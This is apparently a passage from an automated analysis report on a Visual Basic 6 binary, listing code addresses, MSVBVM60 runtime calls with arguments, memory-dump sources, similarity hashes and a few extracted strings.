                  0x0040c393
                  0x0040c399
                  0x0040c3a3
                  0x0040c3a6
                  0x0040c3be
                  0x0040c3cb
                  0x0040c3cc
                  0x0040c3cd
                  0x0040c3ce
                  0x0040c3d7
                  0x0040c3e5
                  0x0040c3eb
                  0x0040c3f8
                  0x0040c41a
                  0x0040c3fa
                  0x0040c3fa
                  0x0040c3ff
                  0x0040c404
                  0x0040c407
                  0x0040c40d
                  0x0040c412
                  0x0040c412
                  0x0040c424
                  0x0040c42c
                  0x0040c430
                  0x0040c434
                  0x0040c435
                  0x0040c437
                  0x0040c43c
                  0x0040c445
                  0x0040c451
                  0x0040c46e
                  0x0040c453
                  0x0040c453
                  0x0040c458
                  0x0040c45d
                  0x0040c462
                  0x0040c462
                  0x0040c492
                  0x0040c496
                  0x0040c49b
                  0x0040c4b3
                  0x0040c4b9
                  0x0040c4bb
                  0x0040c4c8
                  0x0040c4ed
                  0x0040c4ca
                  0x0040c4ca
                  0x0040c4cf
                  0x0040c4d4
                  0x0040c4da
                  0x0040c4e0
                  0x0040c4e5
                  0x0040c4e5
                  0x0040c4fb
                  0x0040c518
                  0x0040c4fd
                  0x0040c4fd
                  0x0040c502
                  0x0040c507
                  0x0040c50c
                  0x0040c50c
                  0x0040c53c
                  0x0040c540
                  0x0040c545
                  0x0040c55d
                  0x0040c560
                  0x0040c562
                  0x0040c56f
                  0x0040c591
                  0x0040c571
                  0x0040c571
                  0x0040c573
                  0x0040c578
                  0x0040c57e
                  0x0040c584
                  0x0040c589
                  0x0040c589
                  0x0040c59f
                  0x0040c5bc
                  0x0040c5a1
                  0x0040c5a1
                  0x0040c5a6
                  0x0040c5ab
                  0x0040c5b0
                  0x0040c5b0
                  0x0040c5e0
                  0x0040c5e4
                  0x0040c5e9
                  0x0040c604
                  0x0040c60a
                  0x0040c60c
                  0x0040c619
                  0x0040c63e
                  0x0040c61b
                  0x0040c61b
                  0x0040c620
                  0x0040c625
                  0x0040c62b
                  0x0040c631
                  0x0040c636
                  0x0040c636
                  0x0040c64c
                  0x0040c669
                  0x0040c64e
                  0x0040c64e
                  0x0040c653
                  0x0040c658
                  0x0040c65d
                  0x0040c65d
                  0x0040c683
                  0x0040c68d
                  0x0040c691
                  0x0040c696
                  0x0040c6ae
                  0x0040c6b4
                  0x0040c6b6
                  0x0040c6c3
                  0x0040c6e8
                  0x0040c6c5
                  0x0040c6c5
                  0x0040c6ca
                  0x0040c6cf
                  0x0040c6d5
                  0x0040c6db
                  0x0040c6e0
                  0x0040c6e0
                  0x0040c6f2
                  0x0040c6f8
                  0x0040c702
                  0x0040c708
                  0x0040c712
                  0x0040c71c
                  0x0040c726
                  0x0040c730
                  0x0040c740
                  0x0040c74a
                  0x0040c750
                  0x0040c75a
                  0x0040c760
                  0x0040c76d
                  0x0040c773
                  0x0040c77d
                  0x0040c780
                  0x0040c794
                  0x0040c7a1
                  0x0040c7a2
                  0x0040c7a3
                  0x0040c7a4
                  0x0040c7bf
                  0x0040c7cc
                  0x0040c7d9
                  0x0040c7da
                  0x0040c7db
                  0x0040c7dc
                  0x0040c7ec
                  0x0040c804
                  0x0040c823
                  0x0040c828
                  0x0040c83a
                  0x0040c849
                  0x0040c855
                  0x0040c872
                  0x0040c857
                  0x0040c857
                  0x0040c85c
                  0x0040c861
                  0x0040c866
                  0x0040c866
                  0x0040c88c
                  0x0040c896
                  0x0040c89a
                  0x0040c89f
                  0x0040c8b7
                  0x0040c8ba
                  0x0040c8bc
                  0x0040c8c9
                  0x0040c8eb
                  0x0040c8cb
                  0x0040c8cb
                  0x0040c8cd
                  0x0040c8d2
                  0x0040c8d8
                  0x0040c8de
                  0x0040c8e3
                  0x0040c8e3
                  0x0040c8f2
                  0x0040c8fc
                  0x0040c906
                  0x0040c90f
                  0x0040c919
                  0x0040c926
                  0x0040c92c
                  0x0040c936
                  0x0040c939
                  0x0040c957
                  0x0040c964
                  0x0040c965
                  0x0040c966
                  0x0040c967
                  0x0040c97b
                  0x0040c981
                  0x0040c98e
                  0x0040c98f
                  0x0040c990
                  0x0040c991
                  0x0040c995
                  0x0040c9a2
                  0x0040c9a3
                  0x0040c9a4
                  0x0040c9a5
                  0x0040c9ae
                  0x0040c9b4
                  0x0040c9c1
                  0x0040c9e3
                  0x0040c9c3
                  0x0040c9c3
                  0x0040c9c8
                  0x0040c9cd
                  0x0040c9d0
                  0x0040c9d6
                  0x0040c9db
                  0x0040c9db
                  0x0040c9f0
                  0x0040c9f6
                  0x0040ca01
                  0x0040ca0d
                  0x0040ca2a
                  0x0040ca0f
                  0x0040ca0f
                  0x0040ca14
                  0x0040ca19
                  0x0040ca1e
                  0x0040ca1e
                  0x0040ca4e
                  0x0040ca52
                  0x0040ca57
                  0x0040ca72
                  0x0040ca78
                  0x0040ca7a
                  0x0040ca87
                  0x0040caac
                  0x0040ca89
                  0x0040ca89
                  0x0040ca8e
                  0x0040ca93
                  0x0040ca99
                  0x0040ca9f
                  0x0040caa4
                  0x0040caa4
                  0x0040caba
                  0x0040cad7
                  0x0040cabc
                  0x0040cabc
                  0x0040cac1
                  0x0040cac6
                  0x0040cacb
                  0x0040cacb
                  0x0040cafb
                  0x0040caff
                  0x0040cb04
                  0x0040cb1f
                  0x0040cb25
                  0x0040cb27
                  0x0040cb34
                  0x0040cb59
                  0x0040cb36
                  0x0040cb36
                  0x0040cb3b
                  0x0040cb40
                  0x0040cb46
                  0x0040cb4c
                  0x0040cb51
                  0x0040cb51
                  0x0040cb67
                  0x0040cb84
                  0x0040cb69
                  0x0040cb69
                  0x0040cb6e
                  0x0040cb73
                  0x0040cb78
                  0x0040cb78
                  0x0040cba8
                  0x0040cbac
                  0x0040cbb1
                  0x0040cbcc
                  0x0040cbd2
                  0x0040cbd4
                  0x0040cbe1
                  0x0040cc06
                  0x0040cbe3
                  0x0040cbe3
                  0x0040cbe8
                  0x0040cbed
                  0x0040cbf3
                  0x0040cbf9
                  0x0040cbfe
                  0x0040cbfe
                  0x0040cc14
                  0x0040cc31
                  0x0040cc16
                  0x0040cc16
                  0x0040cc1b
                  0x0040cc20
                  0x0040cc25
                  0x0040cc25
                  0x0040cc4b
                  0x0040cc55
                  0x0040cc59
                  0x0040cc5e
                  0x0040cc76
                  0x0040cc7c
                  0x0040cc7e
                  0x0040cc8b
                  0x0040ccb0
                  0x0040cc8d
                  0x0040cc8d
                  0x0040cc92
                  0x0040cc97
                  0x0040cc9d
                  0x0040cca3
                  0x0040cca8
                  0x0040cca8
                  0x0040ccc5
                  0x0040ccca
                  0x0040cccd
                  0x0040ccd4
                  0x0040ccd9
                  0x0040ccdf
                  0x0040ccef
                  0x0040cd0e
                  0x0040cd3e
                  0x0040cd44
                  0x0040cd51
                  0x0040cd73
                  0x0040cd53
                  0x0040cd53
                  0x0040cd58
                  0x0040cd5d
                  0x0040cd60
                  0x0040cd66
                  0x0040cd6b
                  0x0040cd6b
                  0x0040cd90
                  0x0040cd95
                  0x0040cd9e
                  0x0040cdab
                  0x0040cdb1
                  0x0040cdb3
                  0x0040cdc0
                  0x0040cde2
                  0x0040cdc2
                  0x0040cdc2
                  0x0040cdc7
                  0x0040cdcc
                  0x0040cdcf
                  0x0040cdd5
                  0x0040cdda
                  0x0040cdda
                  0x0040cde9
                  0x0040cdf3
                  0x0040cdfd
                  0x0040ce07
                  0x0040ce11
                  0x0040ce18
                  0x0040ce28
                  0x0040ce2f
                  0x0040ce36
                  0x0040ce3d
                  0x0040ce44
                  0x0040ce45
                  0x0040ce48
                  0x0040ce49
                  0x0040ce4e
                  0x0040dac4
                  0x0040ce59
                  0x0040ce63
                  0x0040ce79
                  0x0040ce84
                  0x0040ce8a
                  0x0040ce94
                  0x0040cec5
                  0x0040cecb
                  0x0040ced8
                  0x0040cefa
                  0x0040ceda
                  0x0040ceda
                  0x0040cedf
                  0x0040cee4
                  0x0040cee7
                  0x0040ceed
                  0x0040cef2
                  0x0040cef2
                  0x0040cf07
                  0x0040cf13
                  0x0040cf30
                  0x0040cf15
                  0x0040cf15
                  0x0040cf1a
                  0x0040cf1f
                  0x0040cf24
                  0x0040cf24
                  0x0040cf54
                  0x0040cf58
                  0x0040cf5d
                  0x0040cf78
                  0x0040cf7b
                  0x0040cf7d
                  0x0040cf8a
                  0x0040cfac
                  0x0040cf8c
                  0x0040cf8c
                  0x0040cf8e
                  0x0040cf93
                  0x0040cf99
                  0x0040cf9f
                  0x0040cfa4
                  0x0040cfa4
                  0x0040cfba
                  0x0040cfd7
                  0x0040cfbc
                  0x0040cfbc
                  0x0040cfc1
                  0x0040cfc6
                  0x0040cfcb
                  0x0040cfcb
                  0x0040cffb
                  0x0040cfff
                  0x0040d004
                  0x0040d01f
                  0x0040d025
                  0x0040d027
                  0x0040d034
                  0x0040d059
                  0x0040d036
                  0x0040d036
                  0x0040d03b
                  0x0040d040
                  0x0040d046
                  0x0040d04c
                  0x0040d051
                  0x0040d051
                  0x0040d067
                  0x0040d084
                  0x0040d069
                  0x0040d069
                  0x0040d06e
                  0x0040d073
                  0x0040d078
                  0x0040d078
                  0x0040d0a8
                  0x0040d0ac
                  0x0040d0b1
                  0x0040d0c9
                  0x0040d0cf
                  0x0040d0d1
                  0x0040d0de
                  0x0040d103
                  0x0040d0e0
                  0x0040d0e0
                  0x0040d0e5
                  0x0040d0ea
                  0x0040d0f0
                  0x0040d0f6
                  0x0040d0fb
                  0x0040d0fb
                  0x0040d111
                  0x0040d12e
                  0x0040d113
                  0x0040d113
                  0x0040d118
                  0x0040d11d
                  0x0040d122
                  0x0040d122
                  0x0040d152
                  0x0040d156
                  0x0040d15b
                  0x0040d173
                  0x0040d179
                  0x0040d17b
                  0x0040d188
                  0x0040d1ad
                  0x0040d18a
                  0x0040d18a
                  0x0040d18f
                  0x0040d194
                  0x0040d19a
                  0x0040d1a0
                  0x0040d1a5
                  0x0040d1a5
                  0x0040d1b4
                  0x0040d1be
                  0x0040d1c8
                  0x0040d1d2
                  0x0040d1df
                  0x0040d1e5
                  0x0040d1ef
                  0x0040d1f2
                  0x0040d202
                  0x0040d20b
                  0x0040d211
                  0x0040d21e
                  0x0040d229
                  0x0040d235
                  0x0040d23b
                  0x0040d245
                  0x0040d259
                  0x0040d266
                  0x0040d267
                  0x0040d268
                  0x0040d269
                  0x0040d283
                  0x0040d29d
                  0x0040d2aa
                  0x0040d2ab
                  0x0040d2ac
                  0x0040d2ad
                  0x0040d2b6
                  0x0040d2bf
                  0x0040d2c7
                  0x0040d2cb
                  0x0040d2cf
                  0x0040d2d3
                  0x0040d2d4
                  0x0040d2d6
                  0x0040d2e4
                  0x0040d2eb
                  0x0040d2ec
                  0x0040d2ee
                  0x0040d2f3
                  0x0040d2fd
                  0x0040d31a
                  0x0040d2ff
                  0x0040d2ff
                  0x0040d304
                  0x0040d309
                  0x0040d30e
                  0x0040d30e
                  0x0040d33e
                  0x0040d342
                  0x0040d347
                  0x0040d35f
                  0x0040d362
                  0x0040d364
                  0x0040d371
                  0x0040d393
                  0x0040d373
                  0x0040d373
                  0x0040d375
                  0x0040d37a
                  0x0040d380
                  0x0040d386
                  0x0040d38b
                  0x0040d38b
                  0x0040d3a1
                  0x0040d3be
                  0x0040d3a3
                  0x0040d3a3
                  0x0040d3a8
                  0x0040d3ad
                  0x0040d3b2
                  0x0040d3b2
                  0x0040d3e2
                  0x0040d3e6
                  0x0040d3eb
                  0x0040d406
                  0x0040d40c
                  0x0040d40e
                  0x0040d41b
                  0x0040d440
                  0x0040d41d
                  0x0040d41d
                  0x0040d422
                  0x0040d427
                  0x0040d42d
                  0x0040d433
                  0x0040d438
                  0x0040d438
                  0x0040d44e
                  0x0040d46b
                  0x0040d450
                  0x0040d450
                  0x0040d455
                  0x0040d45a
                  0x0040d45f
                  0x0040d45f
                  0x0040d48f
                  0x0040d493
                  0x0040d498
                  0x0040d4b0
                  0x0040d4b3
                  0x0040d4b5
                  0x0040d4c2
                  0x0040d4e4
                  0x0040d4c4
                  0x0040d4c4
                  0x0040d4c6
                  0x0040d4cb
                  0x0040d4d1
                  0x0040d4d7
                  0x0040d4dc
                  0x0040d4dc
                  0x0040d4eb
                  0x0040d4ed
                  0x0040d4ef
                  0x0040d4f8
                  0x0040d4f9
                  0x0040d4fe
                  0x0040d508
                  0x0040d525
                  0x0040d50a
                  0x0040d50a
                  0x0040d50f
                  0x0040d514
                  0x0040d519
                  0x0040d519
                  0x0040d53f
                  0x0040d549
                  0x0040d54d
                  0x0040d552
                  0x0040d56d
                  0x0040d570
                  0x0040d572
                  0x0040d57f
                  0x0040d5a1
                  0x0040d581
                  0x0040d581
                  0x0040d583
                  0x0040d588
                  0x0040d58e
                  0x0040d594
                  0x0040d599
                  0x0040d599
                  0x0040d5ae
                  0x0040d5b4
                  0x0040d5bb
                  0x0040d5c0
                  0x0040d5c9
                  0x0040d5cf
                  0x0040d5d9
                  0x0040d5dc
                  0x0040d5ec
                  0x0040d5f2
                  0x0040d5fc
                  0x0040d61c
                  0x0040d658
                  0x0040d65e
                  0x0040d66b
                  0x0040d68d
                  0x0040d66d
                  0x0040d66d
                  0x0040d672
                  0x0040d677
                  0x0040d67a
                  0x0040d680
                  0x0040d685
                  0x0040d685
                  0x0040d69a
                  0x0040d6a0
                  0x0040d6a4
                  0x0040d6a8
                  0x0040d6ac
                  0x0040d6b0
                  0x0040d6b1
                  0x0040d6b3
                  0x0040d6c1
                  0x0040d6c8
                  0x0040d6c9
                  0x0040d6cb
                  0x0040d6d0
                  0x0040d6da
                  0x0040d6f7
                  0x0040d6dc
                  0x0040d6dc
                  0x0040d6e1
                  0x0040d6e6
                  0x0040d6eb
                  0x0040d6eb
                  0x0040d71b
                  0x0040d71f
                  0x0040d724
                  0x0040d73c
                  0x0040d742
                  0x0040d744
                  0x0040d751
                  0x0040d776
                  0x0040d753
                  0x0040d753
                  0x0040d758
                  0x0040d75d
                  0x0040d763
                  0x0040d769
                  0x0040d76e
                  0x0040d76e
                  0x0040d784
                  0x0040d7a1
                  0x0040d786
                  0x0040d786
                  0x0040d78b
                  0x0040d790
                  0x0040d795
                  0x0040d795
                  0x0040d7c5
                  0x0040d7c9
                  0x0040d7ce
                  0x0040d7e9
                  0x0040d7ef
                  0x0040d7f1
                  0x0040d7fe
                  0x0040d823
                  0x0040d800
                  0x0040d800
                  0x0040d805
                  0x0040d80a
                  0x0040d810
                  0x0040d816
                  0x0040d81b
                  0x0040d81b
                  0x0040d831
                  0x0040d84e
                  0x0040d833
                  0x0040d833
                  0x0040d838
                  0x0040d83d
                  0x0040d842
                  0x0040d842
                  0x0040d872
                  0x0040d876
                  0x0040d87b
                  0x0040d896
                  0x0040d899
                  0x0040d89b
                  0x0040d8a8
                  0x0040d8ca
                  0x0040d8aa
                  0x0040d8aa
                  0x0040d8ac
                  0x0040d8b1
                  0x0040d8b7
                  0x0040d8bd
                  0x0040d8c2
                  0x0040d8c2
                  0x0040d8d8
                  0x0040d8f5
                  0x0040d8da
                  0x0040d8da
                  0x0040d8df
                  0x0040d8e4
                  0x0040d8e9
                  0x0040d8e9
                  0x0040d90f
                  0x0040d919
                  0x0040d91d
                  0x0040d922
                  0x0040d93d
                  0x0040d943
                  0x0040d945
                  0x0040d952
                  0x0040d977
                  0x0040d954
                  0x0040d954
                  0x0040d959
                  0x0040d95e
                  0x0040d964
                  0x0040d96a
                  0x0040d96f
                  0x0040d96f
                  0x0040d984
                  0x0040d990
                  0x0040d99c
                  0x0040d9a2
                  0x0040d9af
                  0x0040d9b5
                  0x0040d9bf
                  0x0040d9c2
                  0x0040d9da
                  0x0040d9e7
                  0x0040d9f4
                  0x0040d9f5
                  0x0040d9f6
                  0x0040d9f7
                  0x0040d9ff
                  0x0040da0a
                  0x0040da17
                  0x0040da18
                  0x0040da19
                  0x0040da1a
                  0x0040da23
                  0x0040da3b
                  0x0040da40
                  0x0040da49
                  0x0040da5d
                  0x0040da63
                  0x0040da70
                  0x0040da92
                  0x0040da72
                  0x0040da72
                  0x0040da77
                  0x0040da7c
                  0x0040da7f
                  0x0040da85
                  0x0040da8a
                  0x0040da8a
                  0x0040daa2
                  0x0040daad
                  0x0040dab4
                  0x0040dab5
                  0x0040dab8
                  0x0040dab9
                  0x0040dabe
                  0x0040dabe
                  0x0040dad9
                  0x0040dadf
                  0x0040dae6
                  0x0040dae7
                  0x0040db48
                  0x0040db49
                  0x0040db4f
                  0x0040db50
                  0x0040db52
                  0x0040db5d
                  0x0040db65
                  0x0040db6d
                  0x0040db72

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BFE8
                  • __vbaVarDup.MSVBVM60 ref: 0040C037
                  • #543.MSVBVM60(?,?), ref: 0040C04A
                  • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040C071
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040C08D
                  • __vbaNew2.MSVBVM60(0040B03C,004103C4,?,?,004012A6), ref: 0040C0B7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B02C,0000001C), ref: 0040C119
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B04C,00000064), ref: 0040C174
                  • __vbaFreeObj.MSVBVM60(00000000,?,0040B04C,00000064), ref: 0040C196
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,004012A6), ref: 0040C1AE
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C1E7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040C22B
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C252
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C28B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000048), ref: 0040C2CF
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C2F6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C32F
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,000000E8), ref: 0040C37C
                  • __vbaChkstk.MSVBVM60(00514F93,?), ref: 0040C3BE
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,000006FC,?,?,00514F93,?), ref: 0040C40D
                  • __vbaFreeStr.MSVBVM60(?,?,00514F93,?), ref: 0040C424
                  • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00514F93,?), ref: 0040C437
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040C445
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,?,?,004012A6), ref: 0040C45D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C496
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000F0), ref: 0040C4E0
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C507
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C540
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000048), ref: 0040C584
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C5AB
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000128), ref: 0040C631
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C658
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C691
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040C6DB
                  • __vbaChkstk.MSVBVM60(00000008), ref: 0040C794
                  • __vbaChkstk.MSVBVM60(?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C7CC
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C804
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C823
                  • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C849
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C861
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C89A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040C8DE
                  • __vbaChkstk.MSVBVM60(667A4DB0,00005B07,?), ref: 0040C957
                  • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C981
                  • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C995
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000700,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9D6
                  • __vbaFreeObj.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9F6
                  • __vbaFreeVar.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA01
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA19
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA52
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA9F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAC6
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAFF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B05C,000001A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB4C
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB73
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBAC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000128,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBF9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC20
                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC59
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000F0,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCA3
                  • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCC5
                  • __vbaI4Var.MSVBVM60(?), ref: 0040CCD4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000704), ref: 0040CD66
                  • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040CD90
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 0040CD9E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD24,000002B4), ref: 0040CDD5
                  • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CE49
                  • __vbaVarDup.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CE79
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000708), ref: 0040CEED
                  • __vbaFreeVar.MSVBVM60(00000000,004011C8,0040AD54,00000708), ref: 0040CF07
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040CF1F
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF58
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B06C,00000068), ref: 0040CF9F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040CFC6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CFFF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000090), ref: 0040D04C
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D073
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0AC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000000F8), ref: 0040D0F6
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D11D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D156
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040D1A0
                  • __vbaStrMove.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040D21E
                  • __vbaChkstk.MSVBVM60(00000003), ref: 0040D259
                  • __vbaChkstk.MSVBVM60(?,?,418E7D50,?,?,?,00000008,00000003), ref: 0040D29D
                  • __vbaFreeStr.MSVBVM60(?,?,?,00000008,00000003), ref: 0040D2BF
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,00000008,00000003), ref: 0040D2D6
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D2EE
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D309
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D342
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040D386
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D3AD
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D3E6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000E8), ref: 0040D433
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D45A
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D493
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000058), ref: 0040D4D7
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040D4F9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D514
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D54D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040D594
                  • __vbaI4Var.MSVBVM60(?), ref: 0040D5BB
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,0000070C,?,?,?,?,?), ref: 0040D680
                  • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040D6B3
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D6CB
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D6E6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D71F
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000170), ref: 0040D769
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D790
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D7C9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000110), ref: 0040D816
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D83D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D876
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000070), ref: 0040D8BD
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D8E4
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D91D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000128), ref: 0040D96A
                  • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040D9E7
                  • __vbaChkstk.MSVBVM60(00005D72,?,?,?,?), ref: 0040DA0A
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0040DA3B
                  • __vbaFreeVar.MSVBVM60 ref: 0040DA49
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000710), ref: 0040DA85
                  • __vbaVarMove.MSVBVM60(00000000,004011C8,0040AD54,00000710), ref: 0040DAA2
                  • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0040DAB9
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040DB73), ref: 0040DB52
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB5D
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB65
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB6D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$CheckHresult$New2$Free$ChkstkList$Move$CallLate$#543InitNext
                  • String ID: 21:21:21$Pt$RRETS$Underbevidsthed$overstiges$z_$BZ$T5
                  • API String ID: 2874494357-181388081
                  • Opcode ID: f0421826c4cc453be7f089f7ee2a9335aab88a91ca71e4829f0ef4cc594867cf
                  • Instruction ID: f556c72d5a6782e2dfb78e47f0c4431e01cb86a0bd26e32385fbcee2f19090dd
